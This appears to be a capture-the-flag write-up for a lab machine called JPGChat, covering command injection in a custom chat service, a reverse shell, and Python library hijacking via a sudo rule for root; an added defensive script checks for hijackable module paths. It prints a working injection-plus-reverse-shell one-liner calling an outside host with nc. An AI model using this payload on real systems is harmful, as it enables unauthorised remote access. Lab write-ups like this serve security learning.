Machine Name: JPGChat
Machine Description: Exploiting poorly made custom chatting service written in a certain language…
Created By: R4v3n
Initial Nmap scan
Port 22 is SSH.
Port 3000 is serving JPChat.
It might be confusing because the box name is JPGChat but the program name is JPChat.
I connected to the port with Netcat.
The banner shows that the source code is available on GitHub. After searching GitHub, the source code is found in the JPChat repository.
The source code shows that the program is vulnerable to command injection.
Next is to get a reverse shell. The payload I used is:
\.';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.10.112 4242 >/tmp/f;'
After the initial foothold, sudo -l shows that the user can execute a Python script as root without a password.
Here Python library hijacking comes into play. I followed this and this.
```python
def __init__(self, *args):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
```
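The defender's side of the library-hijacking step above, added here as an example (not from the writeup or from JPChat): it walks a module search path in import order and reports any entry where a module such as socket could be shadowed, either because the directory is writable by group/other or because an existing socket.py there is. The demo scenario and its directory names are constructed.

```python
import os
import stat
import sys
import tempfile

def writable_by_others(path):
    """True if `path` exists and its mode grants write to group or other."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def hijackable_entries(search_path, module_name):
    """Walk `search_path` in import order; report a directory an unprivileged
    user can write to (a planted <module>.py there wins over the real one
    later on the path) or an existing <module>.py such a user can overwrite."""
    findings = []
    for entry in search_path:
        directory = entry or os.getcwd()  # '' on sys.path means the cwd
        if not os.path.isdir(directory):
            continue
        module_file = os.path.join(directory, module_name + ".py")
        if writable_by_others(directory):
            findings.append((directory, "directory writable by group/other"))
        elif os.path.isfile(module_file) and writable_by_others(module_file):
            findings.append((module_file, "module file writable by group/other"))
    return findings

def demo():
    """Constructed scenario (hypothetical paths): a world-writable directory ahead
    of a locked-down one holding a group-writable socket.py; returns basenames."""
    base = tempfile.mkdtemp()
    loose = os.path.join(base, "loose")
    tight = os.path.join(base, "tight")
    os.mkdir(loose)
    os.chmod(loose, 0o777)
    os.mkdir(tight)
    os.chmod(tight, 0o755)
    shadow = os.path.join(tight, "socket.py")
    with open(shadow, "w") as fh:
        fh.write("# placeholder module\n")
    os.chmod(shadow, 0o664)
    return [(os.path.basename(p), why)
            for p, why in hijackable_entries([loose, tight], "socket")]

if __name__ == "__main__":
    # sys.path[0] is the script's own directory, the classic hijack location.
    for path, why in hijackable_entries(sys.path, "socket"):
        print(f"{path}: {why}")
```

Run it as the account named in the sudo rule, with the same interpreter and script location, so sys.path matches what the privileged invocation will see.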
The gibberish shell was painful, so it's a better option to transfer the file with an HTTP server.
As soon as the program is executed, the reverse shell opens as root.
Voila!! It has been pwned!
I am not sharing any hashes. It's a free machine. Please do it and learn.
I am also learning day by day. If there are any mistakes or improvements, please share them in the comments.